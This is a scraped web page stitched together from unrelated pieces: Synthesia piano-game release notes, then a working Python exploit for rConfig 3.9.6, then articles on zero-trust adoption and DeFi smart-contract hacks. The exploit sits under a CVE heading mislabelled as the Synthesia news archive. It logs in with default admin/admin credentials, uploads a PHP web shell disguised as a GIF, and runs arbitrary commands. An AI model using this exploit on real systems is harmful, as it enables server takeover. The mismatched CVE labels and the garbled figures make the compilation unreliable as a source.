What's new in 0.8.0:

*   Named profiles. See your name next to your scores after playing locally or online. Compete against friends.
*   Many settings can now be changed during gameplay.
*   The beginnings of a new look...
*   A handful of fixes and other tweaks.

Oct 8 2010

**Synthesia 0.7.5**

What's new in _0.7.5_:

*   Competition-ready songs and scoring.
*   Revamped track settings saves time with copy and paste settings.
*   Better song library performance, especially with big collections.
*   Several tweaks and improvements to all play modes.

Sep 1 2010

**Synthesia 0.7.4**

This month we have a few things I've wanted to include forever now.

What's new in _0.7.4_:

*   Lighted keyboard support: the next note will light up while stopped in practice mode. Turn it on via the Keyboard Setup screen.
*   Improved note labels: new mode, more accurate, and easier to read.
*   New configuration tool with windowed mode and resolution picker.
*   Improved looping: easier to use, easier to find, better feedback.
*   A number of stability and other bug fixes.

Aug 1 2010

**Synthesia 0.7.3**

The long-awaited metronome is available at last. Lots of other great engine work made it in to prepare for the upcoming online scoreboard.

What's new in _0.7.3_:

*   Metronome. Control the speed, volume, and style. Works with simple, compound, and even changing time signatures.
*   Have fun with instruments. Click a track's instrument icon to change.
*   Find songs faster. Search with the new song library filter box.
*   Create quick loops between bookmarks using the < and > keys.
*   Speed improvements. Gameplay now runs smoother than ever.

Jun 30 2010

**Synthesia 0.7.2**

Synthesia is moving full-speed ahead now. This is the first of six monthly releases that will run until the end of the year.

Check out what's new below, download the new version, and enjoy!

What's new in _0.7.2_:

*   Song looping: Create loops with one click to keep practicing those tough parts. Statistics are shown in real time detailing how you are improving.
*   Synthesia is now aware of smaller keyboards. Set your size on the keyboard screen and Synthesia will play notes outside your reach or move them closer so you can play them yourself.
*   Scoring revamp: hold notes for their full duration for maximum points!
*   Lots of other improvements and fixes.

May 30 2010

**Synthesia 0.7.1**

It's ready. This is an exciting time for the project. The 0.7.1 release is a great stepping-stone to the newly accelerated development schedule I've just started. Expect to see releases with more, released more often from here on out for the next six months!

In the meantime, check out what's new below, download the new version from the box on the left, and enjoy!

What's new in _0.7.1_:

*   Song Bookmarks: place markers that let you jump right to those tough sections.
*   New play screen navigation: click the timeline to jump, the buttons to navigate, or the mouse-wheel while paused to scroll the song.
*   Your keyboard's sustain pedal will now hold the duration of notes.
*   Sheet music improvement: notes are much smarter about which staff to appear on.
*   Improved song library searching: type a song name to jump right there.
*   Better error reporting: crash report files help me jump right to the problem.
*   Tons of other improvements and bug fixes.

Sep 19 2009

**Synthesia 0.7.0**

I am proud to present the 0.7.0 release of Synthesia. Check out the feature list, download the new version from the box on the left, and enjoy!

What's new in _0.7.0_:

*   New _Song Library_ with audio previews and sorting by difficulty and rating.
*   More than _20 new songs_ and over _100 songs updated_ to split the left/right hand parts. (Thanks Choul, Rickeeey, and TieDyeGuy from the forums!)
*   Scoring for practice mode: now you can follow your progress.
*   Sheet music display improvements including rests and a fixed-width option.
*   An option to require all notes in a chord be pressed at the same time in practice mode.
*   Keyboard setup screen to help diagnose connection problems.
*   Lots of menus re-worked to make navigation easier and more intuitive.
*   New "View in Synthesia" right-click shortcut: a quick MIDI viewer.
*   Tons of other improvements, fixes, and optimizations!

Sep 19 2008

**Synthesia 0.6.5**

It's that time again. Here is the new 0.6.5 release of the game. There is lots of new stuff to check out, so download the new version from the box on the left and enjoy!

What's new in _0.6.5_:

*   Note and key labels (C, C#, D or Do, Re, Mi).
*   Resizeable sheet music display.
*   120+ new songs included from G Major Music Theory.
*   Faster startup and gameplay.
*   The usual assortment of bug fixes and improvements.

Jun 5 2008

**Synthesia 0.6.4**

I am very pleased to present both the new 0.6.4 release of Synthesia. Download the game from the box on the left and enjoy!

What's new in _0.6.4_:

*   Practice mode that waits for the correct notes.
*   Sheet music display with two display styles.
*   Measure lines in the falling notes.
*   Play-settings screen that gives more control over gameplay.
*   Several new options to tweak the display and a handful of bug fixes.

Jan 1 2008

**Synthesia 0.6.3**

What's new in _0.6.3_:

*   Zoom to song or 'You Play' extents so notes are easier to follow.
*   Option screen that allows some tweaking, most-important: play all user input.
*   Lots of bug fixes, new DirectX back-end to correct some issues.
*   A few visual updates.

This one is smaller than expected because the holidays were busier than I had hoped.

Aug 29 2007

**Synthesia 0.6.2**

New in version _0.6.2_ (August 29, 2007)

*   Rewind / fast-forward during songs.
*   Top scores list for each song you play.
*   Song and track settings are saved between plays.
*   New note spark effect.
*   A software keyboard so everyone can try it out.
*   Auto-splitting single-track MIDI songs to have one track per instrument.

Highlights coming up in version _0.6.3_ (December 31, 2007)

*   Sheet music display!
*   Zoom to your keyboard or song extents.
*   Tons of new built-in music and warm-up exercises.
*   Lots of display and game customization via new options screen.
*   Many new visual effects!

May 28 2007

**Synthesia 0.6.1**

_Synthesia 0.6.1_ is now available! Report any problems in the forum. Major changes:

*   External devices can now be selected for output in the Mac version.
*   The Mac version behaves much nicer now (after about a dozen bug fixes).
*   A couple Windows bugs were fixed.

Apr 30 2007

**Synthesia 0.6.0**

It's here! Download either the Windows or the new Mac version of Synthesia 0.6.0 to get improved graphics and performance.

Apr 25 2007

**Activision Cease and Desist**

I have received a cease and desist letter from Activision for the use of the name "Piano Hero". See the cease and desist page for details.

Quick summary: Choose a new name for the project and update the website/game. The 0.6.0 release (introducing Mac support) has been pushed back a week to April-30 to compensate.

Name Suggestions: 430 names (68 duplicates) with 6 images. Check out the complete list.

Winning Name: "Synthesia", suggested by Daniel Lawrence from England. It's an incredible name, thanks again Daniel!

(Check out Destructoid's article about this whole situation. It's funny.)

Feb 20 2007

**Synthesia 0.5.1**

MIDI input now plays back in the correct instrument, feedback and stats have been improved, there are now tooltips on each menu control, lots of bug fixes, a new installer, and a set of 10 fantastic songs from Game Music Themes! What are you waiting for?

Feb 14 2007

**Want a Mac version of Synthesia?**

Alright. You guys are awesome.

The response from just a couple of articles has been absolutely unbelievable and in a **single day** you donated more than enough for a Mac mini. So much, in fact, that I can get an iMac instead. You guys are really incredible, thank you! You will get your Mac version as promised!

Jan 26 2007

**Synthesia 0.5.0**

Synthesia 0.5.0 Released! MIDI input is now supported. Try to get the highest score and earn the best grade. Download Now!

Dec 9 2006

**Synthesia 0.4.0**

Want to learn how to play the piano? Synthesia is a fun way to play any kind of music including your favorite video game music, classical music, and holiday music. Check out the feature list, screenshots, and then download it.

**Features**

*   Supports any MIDI file.
*   Practice left or right hand parts separately.
*   Slow songs down while learning new parts.

**Work In Progress**

*   Real piano is required - no "software" keyboard is provided.
*   MIDI input not supported yet - just play along for now.
*   Without MIDI input, grading or scoring isn't possible.

CVE-2021-33897: Synthesia News Archive

An arbitrary file upload vulnerability in rconfig v3.9.6 allows attackers to execute arbitrary code via a crafted PHP file.

**rconfig 3.9.6 - Arbitrary File Upload**

**Platform:****PHP**

**Date:****2021-04-21**

  

    # Exploit Title: rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (2)
    # Exploit Author: Vishwaraj Bhattrai
    # Date: 18/04/2021
    # Vendor Homepage: https://www.rconfig.com/
    # Software Link: https://www.rconfig.com/
    # Vendor: rConfig
    # Version: <= v3.9.6
    # Tested against Server Host: Linux+XAMPP
    
    import requests
    import sys
    s = requests.Session()
    
    host=sys.argv[1] #Enter the hostname
    cmd=sys.argv[2]  #Enter the command
    
    def exec_cmd(cmd,host):
        print "[+]Executing command"
        path="https://%s/images/vendor/x.php?cmd=%s"%(host,cmd)
        response=requests.get(path)
        print response.text
        print "\n[+]You can access shell via below path"
        print path
    
    def file_upload(cmd,host):
        print "[+]Bypassing file upload"
        burp0_url = "https://"+host+":443/lib/crud/vendors.crud.php"
        burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------3835647072299295753759313500", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/vendors.php", "Upgrade-Insecure-Requests": "1"}
        burp0_cookies = {"_ga": "GA1.2.71516207.1614715346", "PHPSESSID": ""}
        burp0_data = "-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorName\"\r\n\r\nCisco2\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorLogo\"; filename=\"banana.php\"\r\nContent-Type: image/gif\r\n\r\n<?php $cmd=$_GET['x'];system($cmd);?>\n\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"add\"\r\n\r\nadd\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"editid\"\r\n\r\n\r\n-----------------------------3835647072299295753759313500--\r\n"
        requests.post(burp0_url, headers=burp0_headers, cookies=s.cookies,data=burp0_data)
        exec_cmd(cmd,host)
    
    
    def login(host,cmd):
        print "[+]Logging in"
        burp0_url = "https://"+host+":443/lib/crud/userprocess.php"
        burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}
        
        burp0_data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin
        response=s.post(burp0_url, headers=burp0_headers, cookies=s.cookies, data=burp0_data)
        file_upload(cmd,host)
    
    login(host,cmd)

CVE-2022-44384: Offensive Security’s Exploit Database Archive

Researchers find current data protections strategies are failing to get the job done, and IT leaders are concerned, while a lack of qualified IT security talent hampers cyber-defense initiatives.

Organizations are struggling with mounting data losses, increased downtime, and rising recovery costs due to cyberattacks — to the tune of $1.06 million in costs per incident. Meanwhile, IT security staffs are stalled on getting defenses up to speed.

That's according to the 2022 Dell Global Data Protection Index (GDPI) survey of 1,000 IT decision-makers across 15 countries and 14 industries, which found that organizations that experienced disruption have also suffered an average of 2TB data loss and 19 hours of downtime. 

Most respondents (67%) said they lack confidence that their existing data protection measures are sufficient to cope with malware and ransomware threats. A full 63% said they are not very confident that all business-critical data can be reliably recovered in the event of a destructive cyberattack.

Their fears seem founded: Nearly half of respondents (48%) experienced a cyberattack in the past 12 months that prevented access to their data (a 23% increase from 2021) — and that's a trend that Colm Keegan, senior consultant for data protection solutions at Dell Technologies, says will likely continue. 

"The growth and increased distribution of data across edge, core data center and multiple public cloud environments are making it exceedingly difficult for IT admins to protect their data," Keegan explains.

On the protection front, most organizations are falling behind; for instance, 91% are aware of or planning to deploy a zero-trust architecture, but only 12% are fully deployed.

And it's not just advanced defense that's lacking: Keegan points out that 69% of respondents stated they simply cannot meet their backup windows to be prepared for a ransomware attack.

**Data Protection Strategies Face Headwinds**

One of the primary reasons data protection strategies are failing is the lack of visibility of where that data resides and what it is — a problem exacerbated by the rapid, ongoing adoption of cloud-native apps and containers. More than three-quarters of survey respondents said there is a lack of common data protection solutions for these newer technologies.

"Seventy-two percent said they are unable to keep up with what their developers are doing in the cloud — it’s basically a blind spot for them," Keegan says.  

Claude Mandy, chief evangelist of data security at Symmetry Systems, a provider of hybrid cloud data security solutions, agrees that a lack of visibility is the primary reason current data-protection strategies fail.

"Organizations simply do not know what data they have, where it is, let alone how it is protected," he says. "Unfortunately, a lot of the data-protection failures are preventable by simply knowing the answers to these questions."

He adds that the problem is worsened by the constant change of data within an organization. From his perspective, the sheer scale and complexity of millions of individual data objects across thousands of data stored in multiple clouds, multiplied by a seemingly infinite combination of roles and permissions for thousands of user and machine identities, would be challenging for chief information security officers (CISOs) to secure even if they were static. They're not, so the situation is even more challenging.

To boot, in a lot of cases, organizations are using multiple data security tools for different silos of information, with no overarching integration between them.

"The billions of objects form over months or years, and change constantly," Mandy says. "This is further exacerbated through continuous data flows, privilege creep, data sprawl, and organizational churn, resulting in \[visibility\] to data that is far from ideal."

**Zero-Trust Implementation Lags, Despite Interest**

Zero trust is growing in popularity in enterprise security because not trusting users by default works well to reduce risk. Indeed, virtually all the GDPI respondents indicated they intend to implement zero trust into their environments at some point.

However, actual deployment is not happening at a rapid pace — as mentioned, only 12% of respondents indicated they have fully deployed at zero-trust architecture into their environments. According to researchers, the main problem is a critical shortfall in IT skills, particularly as it relates to cyber recovery and data protection.

Widely reported shortages of trained cybersecurity professionals are driving the industry to try to come up with some with creative recruiting and training solutions, but just 65 cybersecurity professionals are in the workforce for every 100 available jobs, a recent study shows.

"If you don’t have cybersecurity professionals on staff, it’s virtually impossible to make progress on deploying a zero-trust framework, unless, of course, you rely on partners to help you get there," Keegan says. "Now consider the demand for these resources in the market. Like supply chain constraints, demand is high, and the supply is low."

Patrick Tiquet, vice president of security and architecture at Keeper Security, a provider of zero-trust and zero-knowledge cybersecurity software, says that zero-trust management can be challenging even with staff on board.

"Implementation of \[zero trust\] is currently a common data-protection strategy," he explains. "However, for \[zero trust\] to be effective, access and roles must first be configured correctly."

This means ensuring the right people have access to the right data and resources within the zero-trust architecture. Roles must be implemented that are adequately scoped to protect the data that role can access — and correctly configuring access to data just one time ("set it and forget it," in other words) is not enough.

"The organization must maintain and manage data access through the lifecycle of the data, and as the organization grows," Tiquet adds. "Organizations must make sure that, as teams grow and change, the access given to a specific role is still appropriate."

**Vendor Consolidation on the To-Do List**

Keegan says it’s likely there will be some retooling at organizations in terms of platforms — many survey respondents (85%) said they believe they would see a benefit through reducing the number of data protection vendors they work with.

"The research tends to support this sentiment," he adds. "For example, those using a single data protection vendor had far fewer incidents of data loss than those using multiple vendors."

Likewise, the cost of data loss incidents resulting from a cyber attack was approximately 34% higher for those organizations working with multiple data protection vendors than those using a single vendor, according to the survey.

John Bambenek, principal threat hunter at Netenrich, a security and operations analytics software-as-a-service (SaaS) company, says the current spate of M&A and consolidation in the cybersecurity market speaks to those drivers — but warns that vendors trying to be all things to all security problems has its own downsides.

"The larger tech firms get, the less ability they have to innovate and solve problems leading to opportunities for new vendors to step in with new solutions," he explains. "It's \[a cycle\] we see of M&A frenzy and stagnation, then new companies enter to innovate — and more M&A."

Keegan, meanwhile, says he is hearing calls in the analyst community that organizations need to consider shifting their investments from cybersecurity prevention to resiliency.

"This means accepting the inevitability that security breaches will occur," he notes. "Moreover, companies need to have a plan that enables them to recover their critical data and business applications in a timely manner to meet their service level objectives."

Zero-Trust Initiatives Stall, as Cyberattack Costs Rocket to $1M per Incident

By Waqas
The smart contracts that govern DeFi are littered with exploitable code, and hackers understand that since hundreds of millions of crypto funds have been siphoned off due to this very issue.
This is a post from HackRead.com Read the original post: We Need Smarter Smart Contracts To Prevent DeFi Hacks

Decentralized finance (DeFi) aims to disrupt the traditional financial world with its promise of greater inclusiveness and faster, anonymous transactions, but to do that it will need to overcome a significant challenge. The smart contracts that govern DeFi are littered with exploitable code that has resulted in millions of dollars of user funds being lost. 

Back in August 2021, Liquid Global, a leading Japanese cryptocurrency exchange, suffered a hack that resulted in more than $97 million worth of crypto being stolen. It was later discovered that hackers had targeted the exchange’s multi-party computation wallets, siphoning the funds within them to four external wallets. The hackers made off with around 107 Bitcoin, 9 million TRON, 11 million XRP, and almost $600 million worth of Ethereum. 

Just one day later, the DeFi industry experienced its largest-ever hack when an attacker made off with a staggering $612 million worth of crypto from the Poly Network protocol. Luckily, the hacker Mr. White Hat returned the funds soon after, saying he was an ethical hacker that just wanted to highlight the vulnerability within the protocol’s smart contract code. It was in any case an extremely close shave, as a less ethical hacker could have easily stumbled across the exploit and made off with a similar amount. 

Later that month, yet another attack targeted the crowdfunding platform, DAO Maker. Once again, smart contract code was exploited by an attacker to gain more than $7 million worth of user’s funds. It meant that hackers stole a combined $716 million worth of crypto that month alone. 

In December of the same year, hackers stole $30 million from the MonoX DEX platform after hackers exploited vulnerabilities in its smart contract.

Fast-forward to this year and the hacks have kept on coming. The biggest so far in 2022 was the attack on Ronin, a cross-chain bridge used by the popular NFT game Axie Infinity. The hackers found a critical vulnerability in Ronin’s code and stole an incredible 1730,000 ETH and over $25 million worth of USDC, for a total gain of $552 million.

That attack came barely a month after another bridge, Wormhole, suffered an attack that lost more than $300 million. Then, in April, the DeFi protocol Beanstalk fell victim to a $182 million hack that took advantage of the 24-hour execution delay in its flash loan smart contract.

**Smart Contracts Are Vulnerable**

With more than $40 billion worth of cryptocurrency locked into the DeFi ecosystem at the time of writing, it seems clear that the industry is here to stay, despite the risks it runs. However, with the top four DeFi protocols – namely Oasis, Lido, Uniswap V2, and Aave – all currently home to more than $4 billion worth of user assets, the worrying spate of high-profile hacks poses a major threat to the industry that could derail its ambition of emerging as a viable alternative to traditional financial services. 

Although some hack attacks are due to lax security measures and phishing attempts on users’ personal keys, the truth is that the majority of funds stolen in the DeFi industry are due to one thing – vulnerabilities in the smart contracts that power the industry. The vulnerabilities might be due to a coding error or external price manipulation or something else, but the end result is always the same – millions of dollars in value lost, and despair for the victims. 

Smart contracts are the self-executing code that underpins DeFi. They run on decentralized blockchain networks and play the role of automating transactions, thereby doing away with the need for a middleman (bank). They allow agreements between anonymous parties to be carried out immediately once certain conditions are met, speeding up transactions and eliminating costly fees. 

But as important as smart contracts are, they’re also littered with vulnerabilities that hackers are only too keen to exploit. That’s not a surprise given some of the amounts they have made off with. DeFi is a tempting target and will continue to be one so long as the vulnerabilities persist.

**How The Industry Has Responded**

The good news is that the DeFi industry is working hard to solve this potentially fatal problem. One way it’s doing so is by maintaining best practices for developers. After all, Solidity, which is the programming language used to create smart contracts on Ethereum, is still new and experimental, so developers can benefit from a helping hand. 

Consensys, an Ethereum software developer, has created a list of best practices that are available on its GitHub page. It provides recommendations for Solidity developers, along with examples of common smart contract hacks. It also provides software that developers can use to try and identify vulnerabilities themselves. Another company, 101 Blockchains, has created an extensive list of blockchain principles and advice around risk mitigation that developers can use to tie up loose ends in their code. 

The proliferation of smart contract hacks has also led to the rise of a new industry around blockchain security. Companies such as Kaspersky offer blockchain security assessments and network penetration testing, while its Endpoint Protection product can secure entire systems at the device level. Meanwhile, the data security firm Cocoon Data’s Safeshare offering relies on patented technology to ensure file security and prevent breaches. 

Also doing good business are the smart contract auditing firms like CertiK, which analyze application codebases for vulnerabilities before they are launched. These extensive audits determine how the code functions, identify bugs, and provide feedback for developers to fix any holes that might be identified. 

In the case of CertiK, it uses specialized software called Skynet Scanning Technologies to review smart contract codes. Meanwhile, Slowmist offers an integrated data system called Blockchain Threat Intelligence, and Quantstamp has created a decentralized smart contract audit protocol that any developer can use to check their code against validator nodes. 

**Rethinking Smart Contracts**

Not everyone is throwing in the towel though. A company called Radix, which defines itself as an asset-oriented smart contract purpose-built for DeFi, is instead aiming to reinvent how smart contacts work, in order to minimize the risk of vulnerabilities creeping into code. 

To do this, Radix has come up with an alternative DeFi infrastructure that doesn’t rely on Solidity and Ethereum Virtual Machine, but rather an entirely new architecture it calls Radix Engine. Notably, it relies on the concept of finite-state machines. Radix’s use of FSMs has resulted in an entirely new developer paradigm compared to Turing complete smart contracts. With it, the opportunities for hackers can be dramatically reduced. 

Rather than using traditional smart contracts, Radix developers instead build their DeFi apps using “components”, which are bits of code that define what their decentralized applications (dApps) can do with “actions”.

In turn, this makes dApps easier to design and analyze, and ensures their behavior is more predictable. The components can be thought of as Lego building bricks – developers can customize them, and link them together with additional components to create the smart contract functionality that powers their dApps.

Because the components are heavily scrutinized by the community and then reused time and again, they’re far more secure than traditional smart contracts that are written from scratch with each and every dApp that’s created. 

Radix dApps built using components can be likened to cogs in a machine. Assuming all of the cogs work as expected, the transaction will be successful. However, if one of the cogs (components) fails, the entire transaction will be aborted, ensuring the user’s funds remain safe in their wallets. 

**A Smarter Future**

The rising popularity of cryptocurrency means that funds will inevitably continue to pour into the DeFi space in the coming years. As such, developers cannot ignore the dangers of smart contract vulnerabilities, meaning they cannot persist with the unreliable development paradigms of the past. 

The good news is that projects like Radix prove that there are ways to bring greater security to DeFi and ensure proper safeguards for users. It remains to be seen if Radix-based DeFi will take off in the long term, but the fact it is getting traction tells us that developers understand they need to be more stringent as they create their smart contract code.

In conclusion, the industry is slowly waking up to the realization that smart contract code must become smarter if the threat of hack attacks is to subside. 

1.  The Lessons to Learn from Nomad Crypto Hack
2.  Meet Blokhaus’s New Open-Source NFT Tool Minterpress
3.  Why general population has to be educated on cryptocurrency
4.  US seizes $1.4 billion in Bitcoin from Silk Road Market Scammer
5.  DeFi Startup AllianceBlock’s Trustless ID Verification Service For Dapps

Tag

#mac